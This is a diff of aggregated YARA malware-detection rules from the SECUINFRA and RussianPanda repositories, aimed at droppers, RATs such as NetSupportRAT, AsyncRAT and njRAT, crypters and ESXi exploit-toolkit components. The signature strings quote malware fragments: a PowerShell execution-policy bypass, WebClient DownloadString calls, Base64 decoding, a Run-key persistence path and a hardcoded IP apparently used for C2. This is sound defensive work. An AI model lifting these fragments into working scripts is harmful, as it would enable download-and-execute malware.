+rule SECUINFRA_DROPPER_WSHRAT_Stage_1 : FILE
 {
 	meta:
-		description = "Detect a Download to %temp% and execution with rundll32.exe"
+		description = "Detects the first stage of WSHRAT as obfuscated JavaScript"
 		author = "SECUINFRA Falcon Team"
-		id = "6b09a6f0-29c6-5baf-ae64-7aa49a37a9d3"
-		date = "2022-09-02"
+		id = "3bd363dc-3183-595e-931b-668eb17495f5"
+		date = "2022-11-02"
 		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L1-L17"
+		reference = "https://bazaar.abuse.ch/sample/ad24ae27346d930e75283b10d4b949a4986c18dbd5872a91f073334a08169a14/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/wshrat.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "4d7860dc94614b10bc0eea0189ad9b964399d4ee6404ebeaef40720c716c592d"
-		score = 65
+		hash = "793eff1b2039727e76fdd04300d44fc6"
+		logic_hash = "1390929d06bd1259dbab425fd4e953119f632be460f57756a0c226e9f510d75a"
+		score = 75
 		quality = 70
-		tags = "POWERSHELL, DOWNLOAD, FILE"
+		tags = "FILE"
 
 	strings:
-		$location = "$Env:temp" nocase
-		$download = "downloadfile(" nocase
-		$rundll = "rundll32.exe"
+		$a1 = "'var {0} = WS{1}teObject(\"ado{2}am\");"
+		$b1 = "String[\"prototype\"]"
+		$b2 = "this.replace("
+		$b3 = "Array.prototype"
 
 	condition:
-		filesize < 100KB and $location and $download and $rundll
+		filesize < 1500KB and $a1 and #b3 > 3 and #b1 > 2 and $b2
 }
-rule SECUINFRA_SUSP_Powershell_Base64_Decode : POWERSHELL B64 FILE
+rule SECUINFRA_DROPPER_Unknown_1 : DROPPER HTA FILE
 {
 	meta:
-		description = "Detects PowerShell code to decode Base64 data. This can yield many FP"
+		description = "Detects unknown HTA Dropper"
 		author = "SECUINFRA Falcon Team"
-		id = "7cb01c0b-d7e3-5196-b78d-f41765ba0368"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/powershell.yar#L19-L31"
+		id = "70c06b9d-8474-5b6e-bd9c-d45a25585ee9"
+		date = "2022-10-02"
+		modified = "2022-02-19"
+		reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/unknown.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "b323089ac61823d969d04a05890ad9fffe8589165d4b026b08e9fd633d4247de"
-		score = 60
-		quality = 50
-		tags = "POWERSHELL, B64, FILE"
+		hash = "1749f4127bba3f7204710286b1252e14"
+		logic_hash = "d02874514bcb6c3603d1bfee702ec9e18c15153bc14a55ca8d637308c3f35a75"
+		score = 75
+		quality = 43
+		tags = "DROPPER, HTA, FILE"
 
 	strings:
-		$b64_decode = "[System.Convert]::FromBase64String("
+		$a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >"
+		$a2 = "Function XmlTime(t)"
+		$a3 = "C:\\ProgramData\\"
+		$a4 = "wscript.exe"
+		$a5 = "Array" nocase
+		$b = "chr" nocase
 
 	condition:
-		filesize < 500KB and $b64_decode
+		filesize < 70KB and all of ( $a* ) and #b > 7
 }
-rule SECUINFRA_SUS_Unsigned_APPX_MSIX_Manifest_Feb23
+rule SECUINFRA_DROPPER_Asyncrat_VBS_February_2022_1 : FILE
 {
 	meta:
-		description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "f24f7e03-3cc5-5214-b6d2-205b69898636"
-		date = "2023-02-01"
-		modified = "2023-02-07"
-		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar#L1-L25"
+		description = "No description has been set in the source file - SecuInfra"
+		author = "SECUINFRA Falcon Team"
+		id = "80f84c2f-7af0-55c1-bc06-d605beae3e33"
+		date = "2022-02-21"
+		modified = "2022-02-21"
+		reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/asyncrat.yar#L2-L18"
 		license_url = "N/A"
-		logic_hash = "4e3de25fdad9d76cefbb191424a739368b521c4f234656c397f4122debe749fa"
-		score = 65
+		logic_hash = "80c86b0cbb7382135bb9ae8c80ac42f499081fe1fe48fadf21f0e136bcc04358"
+		score = 75
 		quality = 70
-		tags = ""
-		tlp = "CLEAR"
+		tags = "FILE"
 
 	strings:
-		$xlmns = "http://schemas.microsoft.com/appx/manifest/"
-		$identity = "OID.2.25.311729368913984317654407730594956997722=1"
-		$s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\""
-		$s_capability = "runFullTrust"
-		$s_peExt = ".exe"
+		$a1 = "http://3.145.46.6/"
+		$b1 = "Const HIDDEN_WINDOW = 0"
+		$b2 = "GetObject(\"winmgmts:\\\\"
+		$c = "replace("
 
 	condition:
-		uint32be( 0x0 ) == 0x3C3F786D and $xlmns and $identity and 2 of ( $s* )
+		filesize < 10KB and ( $a1 or ( all of ( $b* ) and #c > 10 ) )
 }
-rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE
+rule SECUINFRA_DROPPER_Njrat_VBS : VBS NJRAT DROPPER FILE
 {
 	meta:
-		description = "Detects typical staging directories being referenced inside lnk files"
+		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "459ed2e6-133c-5cde-bf49-95bf8a5eb8c8"
+		id = "5296667a-2932-597e-8f49-b7fa755cb387"
 		date = "2022-02-27"
 		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Filetypes/lnk.yar#L31-L46"
+		reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Dropper/njrat.yar#L2-L23"
 		license_url = "N/A"
-		logic_hash = "3f2a04702b39bce48fc85aa68f39e6062c3b5ee37667eb086222a866a5e438e4"
-		score = 65
+		logic_hash = "7640be8850992ee7f05e85e1f781b4c63ccf958cf62da8deacfe9bb116627ceb"
+		score = 75
 		quality = 70
-		tags = "FILE"
+		tags = "VBS, NJRAT, DROPPER, FILE"
 
 	strings:
-		$header = {4c00 0000 0114 0200 0000}
-		$public = "$env:public" wide
+		$a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide
+		$a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide
+		$b1 = "CreateObject(\"WScript.Shell\")" wide
+		$b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide
+		$b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide
+		$b4 = "& DGRP & NvWt & DGRP &" wide
+		$b5 = "= ogidoC$" wide
 
 	condition:
-		filesize < 20KB and ( $header at 0 ) and $public
+		filesize < 300KB and ( ( 1 of ( $a* ) ) or ( 2 of ( $b* ) ) )
 }
 /*
  * YARA Rule Set
  * Repository Name: RussianPanda
  * Repository: https://github.com/RussianPanda95/Yara-Rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: dff551be45bf6382c3d31dea2e9105147ee32e79
  * Number of Rules: 103
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -166964,332 +166911,299 @@ rule SECUINFRA_SUSP_LNK_Staging_Directory : FILE
  *
  * NO LICENSE SET
  */
-rule RUSSIANPANDA_Danabot
+rule RUSSIANPANDA_Smartapesg_JS_Netsupportrat_Stage2 : FILE
 {
 	meta:
-		description = "Detects DanaBot"
+		description = "Detects SmartApeSG JavaScript Stage 2 retrieving NetSupportRAT"
 		author = "RussianPanda"
-		id = "804604d9-db3b-5678-ae0d-67f0e876c93e"
-		date = "2023-12-01"
-		modified = "2023-12-01"
+		id = "2a614e11-be32-5bf1-9fd1-da224f0a644e"
+		date = "2024-01-11"
+		modified = "2024-01-12"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/DanaBot/danabot_yara.yar#L1-L17"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SmartApeSG/SmartApeSG_JS_NetSupportRAT_stage2.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "4968531f27fa1a8bc3fca536a04b75277adefc42addb9f1999c564510cbcb684"
+		hash = "67d8f84b37732cf85e05b327ad6b6a9f"
+		logic_hash = "5a2afaa14d513e0a3c4e52acfb433e53a4541983a05d15318a217c14dc06453c"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$s1 = {55 8b ec 8a 45 08 34 4a 5d c2 04 00}
-		$s2 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 5C 00 53 00 65 00 61 00 4D 00 6F 00 6E 00 6B 00 65 00 79}
-		$s3 = {4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 54 00 68 00 75 00 6E 00 64 00 65 00 72 00 62 00 69 00 72 00 64 00}
-		$s4 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 4F 00 52 00 4C 00 5C 00 57 00 69 00 6E 00 56 00 4E 00 43 00 33 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
-		$s5 = {53 00 6F 00 66 00 74 00 77 00 61 00 72 00 65 00 5C 00 45 00 78 00 63 00 69 00 74 00 65 00 5C 00 50 00 72 00 69 00 76 00 61 00 74 00 65 00 4D 00 65 00 73 00 73 00 65 00 6E 00 67 00 65 00 72 00 5C 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64}
-		$a = {44 45 4C 50 48 49 43 4C 41 53 53}
+		$x1 = "powershell.exe -Ex Bypass -NoP -C $"
+		$x2 = "Get-Random -Minimum -1000 -Maximum 1000"
+		$s1 = "HKCU:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
+		$s2 = "=new ActiveXObject('W"
+		$s3 = "System.Net.WebClient).DownloadString($"
+		$s4 = "FromBase64String"
+		$s5 = "Start-Process -FilePath $"
 
 	condition:
-		3 of ( $s* ) and $a
+		filesize < 1MB and ( ( 1 of ( $x* ) and 3 of them ) or 5 of them )
 }
-
-rule RUSSIANPANDA_Ducktail_Mainbot : FILE
+rule RUSSIANPANDA_Smartapesg_JS_Dropper_Stage1 : FILE
 {
 	meta:
-		description = "Detects Ducktail mainbot"
+		description = "Detects SmartApeSG initial JavaScript file"
 		author = "RussianPanda"
-		id = "f280903f-13d3-54e1-8308-781e3f777d13"
-		date = "2023-12-24"
-		modified = "2023-12-26"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ducktail/ducktail_mainbot-12-2023.yar#L3-L19"
+		id = "9513f323-c315-5ae2-92a5-c831d0a7ce2a"
+		date = "2024-01-11"
+		modified = "2024-01-11"
+		reference = "https://medium.com/walmartglobaltech/smartapesg-4605157a5b80"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SmartApeSG/SmartApeSG_JS_dropper_stage1.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "33b85c6e1e1137aeeb07eba957b73d738a70ddc561b42bd2d39258e90280fca4"
+		hash = "8769d9ebcf14b24a657532cd96f9520f54aa0e799399d840285311dfebe3fb15"
+		logic_hash = "de7e4ec30c780699b46de7baf2a916fdb7331da2ee7c2d637422ea664cd03b82"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {2F 00 61 00 70 00 69 00 2F 00 63 00 68 00 65 00 63 00 6B}
-		$s2 = {62 00 65 00 67 00 69 00 6E 00 20 00 63 00 6F 00 6E 00 6E 00 65 00 63 00 74}
-		$s3 = {62 00 65 00 67 00 69 00 6E 00 20 00 66 00 6C 00 75 00 73 00 68 00 20 00 64 00 6E 00 73}
-		$s4 = {62 00 65 00 67 00 69 00 6E 00 20 00 73 00 65 00 6E 00 64 00 69 00 6E 00 67}
+		$a1 = "'GE'+'T'"
+		$a2 = "'GE','T'"
+		$s1 = "pt.Creat"
+		$s2 = "L2.ServerX"
+		$s3 = "ponseText"
+		$s4 = "MLHTTP.6.0"
+		$s5 = /\/news\.php\?([0-9]|[1-9][0-9]|100)/
 
 	condition:
-		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
+		all of ( $s* ) and filesize < 1MB and any of ( $a* )
 }
-rule RUSSIANPANDA_Ducktail : FILE
+rule RUSSIANPANDA_Mydriversys : FILE
 {
 	meta:
-		description = "Ducktail Infostealer"
+		description = "Detects the malicious driver - MyDriver.sys"
 		author = "RussianPanda"
-		id = "14ba165f-a1f3-5820-a6d8-e2b6ab2fbb51"
-		date = "2023-04-25"
-		modified = "2023-05-05"
+		id = "9b97acfd-21e8-5974-9f95-ecf7c561fada"
+		date = "2025-12-31"
+		modified = "2025-12-31"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ducktail/ducktail.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/win_mal_MyDriverSYS.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "cb248870f6945d7a6d60d54944dc726d40ba326448af39b87325ec56445602a5"
+		hash = "c3f8da7599468c11782c2332497b9e5013d98a1030034243dfed0cf072469c89"
+		logic_hash = "9eb5273dcd895aa861839119a7850461c52bb7f423301f7e0e03d8c382fa3ec9"
 		score = 75
-		quality = 73
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s = {65 5f 73 71 6c 69 74 65 33 2e 64 6c 6c}
-		$s1 = {54 65 6c 65 67 72 61 6d 2e 42 6f 74 2e 64 6c 6c}
-		$s2 = {4e 65 77 74 6f 6e 73 6f 66 74 2e 4a 73 6f 6e 2e 64 6c 6c}
-		$s3 = {42 6f 75 6e 63 79 43 61 73 74 6c 65 2e 43 72 79 70 74 6f 2e 64 6c 6c}
-		$s4 = {53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 53 6f 63 6b 65 74 73 2e 43 6c 69 65 6e 74 2e 64 6c 6c}
-		$s5 = {53 79 73 74 65 6d 2e 4e 65 74 2e 4d 61 69 6c 2e 64 6c 6c}
+		$s1 = "SetGuestInfo  7 11111111"
+		$s2 = "found ESXi%d.%d build-%d"
+		$s3 = "current build is not surpported"
 
 	condition:
-		all of them and filesize > 60MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule RUSSIANPANDA_Ducktail_Myrdpservice_Bot : FILE
+rule RUSSIANPANDA_MAESTRO : FILE
 {
 	meta:
-		description = "Detects Ducktail myRdpService bot"
+		description = "Detects MAESTRO payload"
 		author = "RussianPanda"
-		id = "50786786-a7db-5290-a363-6fda139a0343"
-		date = "2023-12-24"
-		modified = "2023-12-26"
+		id = "c7684ab1-c7ac-504e-9402-ef0bd0b664b9"
+		date = "2025-12-31"
+		modified = "2025-12-31"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ducktail/ducktail_myrdpservice-12-2023.yar#L3-L17"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/win_mal_MAESTRO.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "a329067fbb2acc34c4970167bbce0706c5a3ec09ee89ce16817c105ae1c17b1b"
+		hash = "37972a232ac6d8c402ac4531430967c1fd458b74a52d6d1990688d88956791a7"
+		logic_hash = "943a4508bae1a285efb05232de29463c3ca667c28fd97e0ec9fd2e88df76b6c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {43 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 64 00 65 00 76 00 69 00 63 00 65 00 49 00 64 00 2E 00 74 00 78 00 74}
-		$s2 = {6C 00 6F 00 67 00 5F 00 72 00 64 00 70 00 2A}
-		$s3 = {00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 65 00 64 00}
+		$s1 = "devcon.exe disable \"PCI\\VEN_15AD&DEV_0740\""
+		$s2 = "devcon.exe disable \"ROOT\\VMWVMCIHOSTDEV\""
+		$s3 = "Open SymbolicLink Failed" wide
+		$s4 = "Done!!!" ascii wide
 
 	condition:
-		all of ( $s* ) and filesize < 12MB and pe.exports ( "DotNetRuntimeDebugHeader" )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Solarphantom : FILE
+rule RUSSIANPANDA_Getshellplugin : FILE
 {
 	meta:
-		description = "SolarPhantom Backdoor Detection"
+		description = "Detects GetShell Plugin (client)"
 		author = "RussianPanda"
-		id = "f564a943-e83b-5c1b-ba8c-b227d69d3fd8"
-		date = "2023-06-22"
-		modified = "2023-12-11"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarphantom.yar#L1-L16"
+		id = "f20f1c80-a52a-5f3a-8bbd-915ef77e9850"
+		date = "2025-12-31"
+		modified = "2025-12-31"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/win_mal_GetShellPlugin.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "3b49d301e625d5abf1b726481a80d6a97d33acd3301c12964f2f37d37130c1b7"
+		hash = "4614346fc1ff74f057d189db45aa7dc25d6e7f3d9b68c287a409a53c86dca25e"
+		logic_hash = "758339dc10eab3ae0fd743568ba356e91d2902ad6c8228095322903bdc00af6e"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$p1 = {B8 94 E3 46 00 E8 C6 EB FA FF 8B 45 F8}
-		$p2 = {68 E8 EF 46 00 FF 75 E4}
-		$p3 = {62 72 76 70 72 66 5f 62 6b 70}
+		$s1 = "InfDefaultInstall.exe .\\vsock.inf"
+		$s2 = "InfDefaultInstall.exe .\\vmci.inf"
+		$s3 = "invalid SERVER_CID:PORT"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $p* ) and filesize < 600KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Solarmarker_Loader_PS2EXE : FILE
+rule RUSSIANPANDA_Vsockpuppet : FILE
 {
 	meta:
-		description = "Detects SolarMarker loader using PS2EXE"
+		description = "Detects VSOCKpuppet payload"
 		author = "RussianPanda"
-		id = "837883a1-b657-52ae-95c4-ebafc8ac55de"
-		date = "2024-01-04"
-		modified = "2024-01-04"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarmarker_loader.yar#L1-L17"
+		id = "82ace9c6-5ca2-5665-8ed5-8fecfe54f12c"
+		date = "2025-12-31"
+		modified = "2025-12-31"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ESXiExploitToolkit/linux_mal_VSOCKpuppet.yar#L1-L14"
 		license_url = "N/A"
-		hash = "b45c31679c2516b38c7ff8c395f1d11d"
-		logic_hash = "4f579f350c3320e7b811cae0efe7302e852f59adc02d805f64ba464f8a995f25"
+		hash = "c3f8da7599468c11782c2332497b9e5013d98a1030034243dfed0cf072469c89"
+		logic_hash = "5c83b3303b092372da8ecd7cb8457a37e3f53042cdf8463fc8837208d34f09b6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {72 7B 02 00 70 72 89 02 00 70 72 91 02 00 70 [22] 72 97 02 00 70 72 AB 02 00 70 72 B5 02 00 70}
-		$s2 = {13 0D 72 [3] 70}
-		$s3 = {72 C1 02 00 70 72 B2 03 00 70 72 B8 03 00 70}
+		$s1 = "received command:%s"
+		$s2 = "MCISock_GetAFValue failed"
+		$s3 = "recv_response failed"
+		$s4 = "send_msg_len failed"
 
 	condition:
-		all of ( $s* ) and filesize > 200MB
+		uint32( 0 ) == 0x464C457F and all of them
 }
-rule RUSSIANPANDA_Solardropper
+rule RUSSIANPANDA_Cowtunnel : FILE
 {
 	meta:
-		description = "SolarMarker first stage detection"
+		description = "Detects CowTunnel"
 		author = "RussianPanda"
-		id = "8e40b001-ae00-5768-bb91-e45264748087"
-		date = "2023-06-22"
-		modified = "2024-01-03"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solardropper.yar#L1-L15"
+		id = "dc9f8416-0f5b-51d8-ad13-46ebe40af13a"
+		date = "2025-12-08"
+		modified = "2025-12-08"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/CowTunnel/linux_mal_CowTunnel.yar#L1-L13"
 		license_url = "N/A"
-		logic_hash = "5dccb7be94e814335c0c867f8b3dd8855043375fe9f1235d5519c690fc7df842"
+		hash = "776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273"
+		logic_hash = "80c96d02e216331ec0b711ae1a1ee5fcf31df8847009afe23735abc3f8bd8ec9"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$p1 = {2d 00 71 00 71 00 78 00 74 00 72 00 61 00 63 00 74 00 3a 00 22 00 3c 00 66 00 69 00 6c 00 71 00 71 00 6e 00 61 00 6d 00 71 00 71 00 3e 00 22 00}
-		$p2 = "deimos.exe"
-		$p3 = {5e 00 2d 00 28 00 5b 00 5e 00 3a 00 20 00 5d 00 2b 00 29 00 5b 00 20 00 3a 00 5d 00 3f 00 28 00 5b 00 5e 00 3a 00 5d 00 2a 00 29 00 24 00}
-
-	condition:
-		all of ( $p* )
-}
-rule RUSSIANPANDA_Solarmarker_First_Stage_Payload : FILE
-{
-	meta:
-		description = "Detects SolarMarker First Stage payload"
-		author = "RussianPanda"
-		id = "56eec644-9ad7-51db-9d11-68ea3e12c36a"
-		date = "2024-01-30"
-		modified = "2024-01-30"
-		reference = "https://x.com/luke92881/status/1751968350689771966?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarmarker_first_stage_payload.yar#L1-L21"
-		license_url = "N/A"
-		hash = "f53563541293a826738d3b8f1164ea43"
-		logic_hash = "e704614782b0f3cba60c53413e889113d2d44f37e60801205e5ed5ff921b13ee"
-		score = 75
-		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = {63 72 65 64 75 69}
-		$s2 = {43 72 65 64 55 49 50 72 6F 6D 70 74 46 6F 72 43 72 65 64 65 6E 74 69 61 6C 73}
-		$s3 = {50 6F 77 65 72 53 68 65 6C 6C}
-		$s4 = {73 65 74 5F 43 75 72 73 6F 72 50 6F 73 69 74 69 6F 6E}
-		$s5 = {73 65 74 5F 41 63 63 65 70 74 42 75 74 74 6F 6E}
-		$s6 = {4D 65 73 73 61 67 65 42 6F 78 42 75 74 74 6F 6E 73}
-		$s7 = {41 67 69 6C 65 44 6F 74 4E 65 74 52 54}
-		$s8 = "_CorExeMain"
+		$s1 = "cannot create proxy service, it should not happenned!"
+		$s2 = "[nss] encrypt_data"
+		$s3 = "[nss] decrypt_data"
 
 	condition:
-		all of them and filesize > 250MB
+		uint32( 0 ) == 0x464c457f and all of them
 }
 
-rule RUSSIANPANDA_Solarmarker_Loader : FILE
+rule RUSSIANPANDA_Purecrypter : FILE
 {
 	meta:
-		description = "Detects SolarMarker loader 1-4-2024"
+		description = "Detects PureCrypter"
 		author = "RussianPanda"
-		id = "b385fcd4-62b7-5a83-8a2e-6841fdd17526"
-		date = "2024-01-04"
-		modified = "2024-01-04"
-		reference = "https://www.esentire.com/blog/solarmarker-to-jupyter-and-back"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SolarMarker/solarmarker_backdoor.yar#L3-L19"
+		id = "5670772c-ada1-55fa-b7fd-9dadd1756259"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PureCrypter/purecrypter.yar#L3-L22"
 		license_url = "N/A"
-		hash = "8eeefe0df0b057fc866b8d35625156de"
-		logic_hash = "035eccb41f2ecdeb196003542c165cedad96e3e8e741511b4beda3dfe1ece74e"
+		hash = "566d8749e166436792dfcbb5e5514f18c9afc0e1314833ac2e3d86f37ff2030f"
+		logic_hash = "dd8592fa0b7d240d23235008601500a20e068032f6dcd6e90a38b06ac747b8af"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = {06 [0-7] 58 D1 8C [3] 01 28 [3] 0A 0A}
+		$s1 = {28 ?? 00 00 ?? 28 02 00 00 2B 28 ?? 00 00 (0A|06)}
+		$s2 = {73 ?? 00 00 0A}
+		$s3 = {73 ?? 00 00 06 6F ?? 00 00 06}
+		$s4 = {52 65 73 6F 75 72 63 65 4D 61 6E 61 67 65 72}
+		$s5 = {28 ?? 00 00 ?? 6F ?? 00 00 0A 28 03 00 00 2B ?? 6F ?? 00 00 0A 28 ?? 00 00 2B}
 
 	condition:
-		all of ( $s* ) and #s1 > 5 and filesize < 7MB and pe.imports ( "mscoree.dll" )
+		filesize < 6MB and 4 of ( $s* ) and dotnet.number_of_resources > 0 and dotnet.number_of_resources < 2 and dotnet.resources [ 0 ] . length > 300KB
 }
-rule RUSSIANPANDA_Zharkbot : FILE
-{
-	meta:
-		description = "Detects ZharkBot, version 1.2.5"
-		author = "RussianPanda"
-		id = "e20875ed-a0a1-5ac8-8758-33766c522c17"
-		date = "2024-09-02"
-		modified = "2024-09-03"
-		reference = "https://research.openanalysis.net/zharkbot/triage/x64dbg/2024/09/02/zharkbot-config.html"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ZharkBot/Zharkbot.yar#L1-L15"
-		license_url = "N/A"
-		hash = "1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109"
-		logic_hash = "fded6a0c7af4fda13619778669ef619f88b43e12f12284a3c551c4fddac01024"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = "^[a-z]{8}$"
-		$s2 = "^d{6}$"
 
-	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize < 500KB
-}
-rule RUSSIANPANDA_Zharkbot_1 : FILE
+rule RUSSIANPANDA_Purecrypter_Core : FILE
 {
 	meta:
-		description = "Detects ZharkBot"
+		description = "Detects PureCrypter Core payload"
 		author = "RussianPanda"
-		id = "54213d76-7e27-559d-b653-5390a0c6813c"
-		date = "2024-01-21"
-		modified = "2024-03-12"
-		reference = "https://x.com/ViriBack/status/1749184882822029564?s=20"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ZharkBot/zharkbot.yar#L1-L15"
+		id = "41aaa187-0fb5-53fe-a162-8d1a4974ccc1"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PureCrypter/purecrypter_core.yar#L3-L28"
 		license_url = "N/A"
